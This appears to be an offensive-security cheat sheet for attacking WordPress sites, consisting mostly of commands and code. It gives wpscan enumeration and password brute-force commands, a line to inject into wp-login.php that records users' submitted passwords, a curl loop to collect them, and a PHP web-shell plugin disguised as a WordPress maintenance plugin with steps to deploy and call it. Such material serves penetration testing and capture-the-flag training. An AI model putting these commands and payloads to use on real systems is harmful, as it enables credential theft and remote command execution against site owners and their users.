Wordpress
Nmap Scan
nmap -n -p<PORT> --script http-wordpress-enum <DNS>bashwpscan
Installation
gem install wpscanBasic Scan
wpscan --url https://example.comUsers
wpscan --url https://example.com --enumerate uPlugins
wpscan --url https://example.com --enumerate apThemes
wpscan --url https://example.com --enumerate atWith output
wpscan --url https://example.com --output example.jsonCustom User-Agent
wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"Disable TLS check
wpscan --url https://brainfuck.htb --disable-tls-checksBrute-Forcing
With username
wpscan --url https://example.com --passwords passwords.txt --usernames adminWith users wordlist
wpscan --url https://example.com --passwords passwords.txt --usernames users.txtWith a custom wordlist
wpscan --url https://example.com --passwords custom.txtVulnerability Scanner
Full Scan
wpscan --url https://example.com --enumerate vp,vt,vtPlugins
wpscan --url https://example.com --enumerate vpThemes
wpscan --url https://example.com --enumerate vtTimthumbs
wpscan --url https://example.com --enumerate ttUses WPVulnDB
wpscan --url https://example.com --enumerate vp,vt,vt --api-token YOUR_API_TOKENHarvesting Credentials
If is possible to write in
wp-login.php, add this line just after<?php:
file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);Use this command to get the hijacked file as soon as is used:
watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txtCreate Malicious Plugins
POC
<?php
/*
Plugin Name: WordPress Maintanance Plugin
Plugin URI: wordpress.org
Description: WordPress Maintenance Activities
Author: WordPress
Version: 1.0
Author URI: wordpress.org
*/
system($_GET["cmd"]);
?>Remember to compress it
zip evil-plugin.zip evil-plugin.phpCall The Web Shell
curl http://SITE/main/wp-content/plugins/evil-plugin/shell.php?cmd=idLast updated